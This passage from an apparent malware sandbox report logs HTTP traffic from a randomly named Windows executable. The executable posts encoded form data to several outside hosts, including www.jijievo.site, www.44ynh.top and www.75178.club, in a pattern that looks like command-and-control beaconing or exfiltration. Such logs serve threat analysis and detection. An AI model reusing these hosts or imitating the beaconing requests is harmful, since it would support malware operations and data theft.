                                                                Dec 11, 2024 15:04:18.470424891 CET1787OUTPOST /521z/ HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.jijievo.site
                                                                Referer: http://www.jijievo.site/521z/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 39 6b 45 6e 6f 74 6a 58 7a 75 6b 53 50 78 48 74 34 4f 7a 6c 41 33 32 6d 31 48 49 48 48 71 37 64 33 72 39 61 2f 34 48 63 4d 56 47 58 51 71 4e 34 2b 34 33 51 52 63 6c 51 6a 42 4b 74 58 63 42 69 68 4e 75 63 5a 52 74 49 78 7a 46 53 74 4a 63 43 74 31 36 7a 33 55 6f 68 59 32 46 64 74 76 2b 77 32 45 35 33 37 38 39 38 2f 53 43 54 4b 35 65 72 39 58 33 66 39 7a 37 39 46 68 41 54 46 4f 6c 68 53 44 7a 59 49 30 70 36 46 39 41 4c 74 4f 47 59 36 31 4b 46 45 4c 4a 77 6b 57 61 4f 6f 57 61 4b 32 38 4b 33 6e 4d 4b 74 54 70 44 64 61 45 63 67 6a 37 46 35 4e 59 37 66 41 56 4f 32 44 34 30 42 6b 73 39 4c 70 45 34 48 47 47 56 46 39 34 63 35 68 57 53 37 2b 4e 77 66 50 4b 34 4c 69 6c 70 6b 53 32 68 7a 56 6a 4e 51 57 68 33 49 69 61 41 44 63 4b 72 4a 69 30 73 30 52 6a 69 52 37 55 62 69 61 78 37 75 67 4a 45 36 38 62 59 48 69 2f 45 57 67 32 77 42 4a 6d 68 46 42 43 57 55 41 45 58 [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRI9kEnotjXzukSPxHt4OzlA32m1HIHHq7d3r9a/4HcMVGXQqN4+43QRclQjBKtXcBihNucZRtIxzFStJcCt16z3UohY2Fdtv+w2E537898/SCTK5er9X3f9z79FhATFOlhSDzYI0p6F9ALtOGY61KFELJwkWaOoWaK28K3nMKtTpDdaEcgj7F5NY7fAVO2D40Bks9LpE4HGGVF94c5hWS7+NwfPK4LilpkS2hzVjNQWh3IiaADcKrJi0s0RjiR7Ubiax7ugJE68bYHi/EWg2wBJmhFBCWUAEXYJVvDuoNeTGOA7sUY1Es4b2SiziG8BFCjLsop0NbUwGABjWA7EI8wGt8payRmRcAaW1YoJE5dqww0YGzGcTqXuDBmlxDmFcTfn/vdpRRq0dR6ZqrTKEWgOhDmbd2LgtZmt1QQxykJ52/ECRwncwvbN1X8Unvc5hWyUz2JpkEqbfz/GdWv/cfofpaIuXdtRiq6yDUYVoQSFAACo0lSN+hXlwsxJQwV3SsHtw4KyAzCe0slKev+zbVyuW5XlKgN+FKGMYCILbDZnPDpFzr+BfOiQgLbaGyduyirPVT1yzroct+WZl2QRM4QSZvPtfXZ1Cv0YS0Vvvpk8XfbD25CqzV19q/kz7QCxR0UjTg+Ylo8hCcrCJzGjQn1aDTGf+rPZTizZCrPQK4+N9hOyMscDR6HovPyBftYAg/U0udCWToG/Dri+EUOyqzW94Es99XwPS1l0ukFG2u4XgyqWcs/0LkDOiq9TJhKy4dR5LEXF9TuJHGBkyXdBE6C8WjFre1ijxOR0XLW2fG3KXQdEMmJb0TkWyRfDuEoNGIQiX2v/GVS1sN3UtrNhhfQnwC4EyDWtrG8LpEzjVyS6Y8Myl0Jn6jNruCH6JtLdFoiW6+2O/Nyh1360NOkFkfDX0b5qtWYWi7e69BB6R99oekRvYbrhdrnKCaEGi2c3udiP [TRUNCATED]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.749939154.90.58.209804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:21.137115002 CET494OUTGET /521z/?9rKHjDxP=Yx3A360WU89Z0GGKhcjTsfSOrSBN5i2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/G2BSEq3A6jonlAGxKbazJEUegoNulYJrFScZeGEO6SiohwMlB95u5jWi&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.jijievo.site
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:04:22.734311104 CET197INHTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=UTF-8
                                                                Date: Wed, 11 Dec 2024 14:04:22 GMT
                                                                Server: nginx
                                                                Vary: Accept-Encoding
                                                                Content-Length: 24
                                                                Connection: close
                                                                Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                Data Ascii: Unable to get connection


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.74995538.181.21.178804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:28.480719090 CET745OUTPOST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 37 66 76 69 61 61 53 56 4e 54 56 6a 55 59 35 48 55 4a 5a 31 6b 75 31 31 55 6e 57 4d 47 68 59 78 43 78 2b 63 54 49 46 31 37 78 77 59 43 5a 6a 71 72 4a 61 67 4a 4d 70 52 63 76 39 66 64 62 59 71 45 4c 42 54 79 4d 4d 44 31 4c 32 35 78 39 70 33 6d 34 2b 48 36 4a 4e 61 34 77 69 51 57 64 47 73 62 78 4a 51 4b 62 4d 32 52 30 71 75 61 70 56 58 37 74 4c 4e 72 53 48 72 59 51 63 69 30 36 74 31 4e 74 4c 6b 63 32 52 4b 39 47 76 39 53 4d 33 44 56 62 6f 62 70 62 51 6b 62 7a 41 57 4f 31 35 5a 6f 63 71 48 56 72 76 38 72 58 7a 38 50 50 70 4e 68 67 2f 6b 31 39 78 6a 6c 2f 36 31 79 6d 78 67 6f 33 74 4c 6d 51 3d 3d
                                                                Data Ascii: 9rKHjDxP=QIA1AtWFQ3Bg7fviaaSVNTVjUY5HUJZ1ku11UnWMGhYxCx+cTIF17xwYCZjqrJagJMpRcv9fdbYqELBTyMMD1L25x9p3m4+H6JNa4wiQWdGsbxJQKbM2R0quapVX7tLNrSHrYQci06t1NtLkc2RK9Gv9SM3DVbobpbQkbzAWO15ZocqHVrv8rXz8PPpNhg/k19xjl/61ymxgo3tLmQ==
                                                                Dec 11, 2024 15:04:30.001517057 CET302INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.74996438.181.21.178804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:31.135067940 CET765OUTPOST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 77 78 46 54 32 63 51 4e 70 31 33 52 77 59 62 70 6a 76 6c 70 61 64 4a 4d 6b 69 63 75 78 66 64 66 77 71 45 4b 78 54 79 36 45 43 31 62 32 2f 6b 74 70 35 72 59 2b 48 36 4a 4e 61 34 77 6e 39 57 5a 53 73 62 46 31 51 4a 2b 73 33 59 55 71 70 4d 35 56 58 2f 74 4c 4a 72 53 48 56 59 56 31 2f 30 38 70 31 4e 6f 76 6b 64 6b 35 56 30 47 76 37 66 73 32 42 55 4f 46 54 73 6f 34 71 58 6a 45 71 4d 43 6c 2f 74 71 72 6c 50 4a 6a 51 31 47 4c 48 4c 4e 4e 37 32 47 69 52 33 38 31 37 6f 64 4f 55 74 52 55 4b 6c 6c 4d 50 77 70 30 74 59 6c 6e 63 7a 66 32 6d 79 31 47 6c 48 4d 75 55 46 51 55 3d
                                                                Data Ascii: 9rKHjDxP=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUwxFT2cQNp13RwYbpjvlpadJMkicuxfdfwqEKxTy6EC1b2/ktp5rY+H6JNa4wn9WZSsbF1QJ+s3YUqpM5VX/tLJrSHVYV1/08p1Novkdk5V0Gv7fs2BUOFTso4qXjEqMCl/tqrlPJjQ1GLHLNN72GiR3817odOUtRUKllMPwp0tYlnczf2my1GlHMuUFQU=
                                                                Dec 11, 2024 15:04:32.666948080 CET302INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:32 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.74997238.181.21.178804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:33.792908907 CET1778OUTPOST /l9wb/ HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.44ynh.top
                                                                Referer: http://www.44ynh.top/l9wb/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 6f 78 46 68 4f 63 53 75 78 31 32 52 77 59 54 4a 6a 75 6c 70 61 4d 4a 4d 4d 75 63 75 74 50 64 64 49 71 57 5a 35 54 30 49 73 43 2b 62 32 2f 6d 74 70 30 6d 34 2b 57 36 4a 64 57 34 77 33 39 57 5a 53 73 62 45 6c 51 64 62 4d 33 65 55 71 75 61 70 56 54 37 74 4b 75 72 54 76 6a 59 56 78 76 30 73 4a 31 4f 49 2f 6b 52 33 52 56 37 47 76 35 4d 63 32 6a 55 4f 42 63 73 6f 6b 78 58 67 59 4d 4d 46 4a 2f 76 65 6d 75 64 62 72 4c 70 6e 33 4d 4b 2b 45 65 30 6e 4f 67 32 61 4a 6d 6d 4e 53 54 73 69 55 72 75 57 77 44 38 4d 6b 72 4e 6b 72 55 71 2b 71 59 79 41 54 2b 61 74 4f 30 48 6e 4b 49 4c 79 2b 57 39 2f 54 75 39 65 73 6c 51 42 6e 6f 68 34 71 63 68 4f 41 7a 2b 59 65 6e 55 54 65 47 79 38 4e 67 4c 49 59 32 6e 53 32 4b 2b 73 44 66 70 42 47 6d 72 4e 4b 4d 63 6f 2f 55 2b 6c 59 69 58 48 36 66 32 51 47 56 46 7a 66 5a 2b 65 4b 51 73 6c 67 6c 73 55 4d 58 34 66 32 69 70 57 2f 6f 6b [TRUNCATED]
                                                                Data Ascii: 9rKHjDxP=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUoxFhOcSux12RwYTJjulpaMJMMucutPddIqWZ5T0IsC+b2/mtp0m4+W6JdW4w39WZSsbElQdbM3eUquapVT7tKurTvjYVxv0sJ1OI/kR3RV7Gv5Mc2jUOBcsokxXgYMMFJ/vemudbrLpn3MK+Ee0nOg2aJmmNSTsiUruWwD8MkrNkrUq+qYyAT+atO0HnKILy+W9/Tu9eslQBnoh4qchOAz+YenUTeGy8NgLIY2nS2K+sDfpBGmrNKMco/U+lYiXH6f2QGVFzfZ+eKQslglsUMX4f2ipW/ok8b6GjwOr5y/L0nVx0V1nqReUW1qkiKETZA2/ritD8G4ogXjcVv50NZwVyovlK4aEuHL5Ha5H08nqCrbdUBfGAqsl7jcOhHvd4dT/rRGtuydr16i4NMIutaMlPX7TZkOGBe701+YBpMO/cMk88w6LcWRMa1Hd5TneD0g9MxV10RBToqytN1Nnu31z6Q/Y3ZAkUGjDYmb2X5AKur46RbLm7so+bqcLHe5DbBmVMo+jP6p7keSxKRfZ6BOx8toI/DUUOPfgU6oJD3pxe1XiBUWGt36LfDslHNcx0itCGLQVOQkbqBHcq0RQMT0FGbM3/nJoPcgobgOI7khVCdBYxgfUnebR8cKtgohhhLYa9MW+mjf0kt7Zyw4DWbIvtKhX+S88fFavxw5E2HJFizQ+JwQ8GrdOvTnDUvfwKo3iWmDvFdGq0fmA5ACkYdT+/uPBJ8xp3K7j+MyAzlG7ex6KMZCwApd6X2LdGD+A1GitFaZ9qN7jFYFRHeZWM1aG9SLANsKRZ4XqId/vB/7rqg2QvH64n5gliCMwcFjD4xRz885Ir23/UtDNahvTrd5cwuc/yeeTnubXzLcSQzEJjFLXvGO3mgDmphSh34JAt+w5ibqiF+Ju/nLvB3hne3yVkDFWnnoUaPWMblsqUKeJ3EK1U7IAc0oJXJBORO7EMy [TRUNCATED]
                                                                Dec 11, 2024 15:04:35.320136070 CET302INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.74997838.181.21.178804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:36.445671082 CET491OUTGET /l9wb/?9rKHjDxP=dKoVDaTSZmwFjIfkW8eCOVVdW49NdaF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvxumUtdp8gpSZ+pYO0AiTerbcUhpiZvFAaWm7Nt0Fw8mr3zjcUwdfloZd&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.44ynh.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:04:37.967968941 CET302INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 11 Dec 2024 14:04:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 138
                                                                Connection: close
                                                                ETag: "66df0ead-8a"
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.74998423.167.152.41804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:53.003578901 CET748OUTPOST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 221
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 71 55 75 59 6d 50 51 52 54 6a 57 62 62 45 73 59 2f 56 61 55 6d 62 72 71 78 32 49 43 47 67 30 47 56 49 4e 45 50 75 32 4e 64 5a 66 46 7a 4d 77 6f 68 46 32 6d 6a 65 2b 79 4b 4a 72 78 33 68 68 45 70 50 6a 36 5a 4b 67 39 70 55 34 6f 54 6f 64 44 30 6c 47 63 4a 73 4a 32 36 65 59 41 44 39 4e 74 58 31 6f 6e 47 48 32 62 41 2f 38 59 5a 55 6e 45 49 59 47 74 73 45 48 47 41 45 6c 47 6b 64 69 74 76 66 4b 30 52 46 42 56 64 30 70 4b 45 55 48 7a 31 34 50 76 61 4a 30 63 37 68 39 6d 67 30 5a 43 67 4a 43 76 34 4b 58 51 42 46 69 6d 71 41 55 69 73 4c 34 53 2b 45 71 37 52 42 6b 6f 63 4d 65 36 47 73 65 58 74 77 3d 3d
                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxqUuYmPQRTjWbbEsY/VaUmbrqx2ICGg0GVINEPu2NdZfFzMwohF2mje+yKJrx3hhEpPj6ZKg9pU4oTodD0lGcJsJ26eYAD9NtX1onGH2bA/8YZUnEIYGtsEHGAElGkditvfK0RFBVd0pKEUHz14PvaJ0c7h9mg0ZCgJCv4KXQBFimqAUisL4S+Eq7RBkocMe6GseXtw==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.74998523.167.152.41804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:55.666630983 CET768OUTPOST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 241
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 55 59 47 56 73 4a 45 49 73 65 4e 51 35 66 46 34 73 77 68 38 56 32 54 6a 65 79 4d 4b 49 58 78 33 68 31 45 70 4f 54 36 5a 37 67 38 6f 45 34 71 47 34 64 42 72 31 47 63 4a 73 4a 32 36 59 31 6c 44 39 46 74 57 46 34 6e 4a 46 4f 45 4d 66 38 58 59 55 6e 45 44 34 47 70 73 45 48 42 41 46 4a 34 6b 66 61 74 76 66 61 30 52 52 56 61 58 30 6f 50 4f 30 47 54 32 4b 36 4c 57 37 6f 63 32 41 78 7a 75 45 6c 79 6c 2f 44 4e 69 6f 62 38 66 55 61 64 75 43 77 55 37 74 6c 6e 38 46 75 6a 63 6a 51 4a 44 37 37 51 4c 2b 2f 54 37 49 41 4b 34 45 6e 63 6d 2f 43 6a 52 4a 6b 70 6e 50 5a 37 51 7a 67 3d
                                                                Data Ascii: 9rKHjDxP=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBUYGVsJEIseNQ5fF4swh8V2TjeyMKIXx3h1EpOT6Z7g8oE4qG4dBr1GcJsJ26Y1lD9FtWF4nJFOEMf8XYUnED4GpsEHBAFJ4kfatvfa0RRVaX0oPO0GT2K6LW7oc2AxzuElyl/DNiob8fUaduCwU7tln8FujcjQJD77QL+/T7IAK4Encm/CjRJkpnPZ7Qzg=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.74998623.167.152.41804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:04:58.322983027 CET1781OUTPOST /q34f/ HTTP/1.1
                                                                Host: www.75178.club
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Cache-Control: no-cache
                                                                Content-Length: 1253
                                                                Origin: http://www.75178.club
                                                                Referer: http://www.75178.club/q34f/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Data Raw: 39 72 4b 48 6a 44 78 50 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 56 4d 47 56 2f 52 45 4f 4e 65 4e 52 35 66 46 78 4d 77 6b 38 56 32 4b 6a 65 37 4c 4b 49 61 4d 33 69 4e 45 70 73 62 36 49 2f 30 38 68 45 34 71 45 34 64 41 30 6c 47 7a 4a 73 5a 79 36 59 46 6c 44 39 46 74 57 41 30 6e 4f 58 32 45 4f 66 38 59 5a 55 6e 49 49 59 47 4e 73 45 76 4f 41 46 39 6f 6b 76 36 74 71 4c 47 30 54 6b 42 61 62 30 6f 42 4a 30 47 78 32 4b 6d 55 57 36 46 6e 32 41 46 5a 75 44 42 79 6e 36 6a 56 33 37 4c 2f 4d 6b 4b 4c 77 6a 64 30 7a 74 78 54 79 6d 2b 70 63 44 63 32 42 4c 48 57 4c 50 75 65 36 4d 68 7a 70 48 7a 76 6d 64 6d 50 62 4f 4a 36 7a 50 78 36 4e 57 76 49 68 36 59 63 33 4f 2b 6f 59 65 6a 53 39 38 78 31 53 4f 63 72 54 49 4d 73 4a 38 44 4b 6c 32 35 69 45 53 65 57 31 49 46 4c 41 63 62 4e 4e 65 61 7a 75 78 59 4e 45 42 32 6f 4a 74 69 30 45 44 4d 33 59 71 39 39 57 35 6a 41 56 79 49 53 41 79 74 79 77 77 62 30 53 65 70 56 2b 42 6d 33 4f 70 6b 75 6c [TRUNCATED]
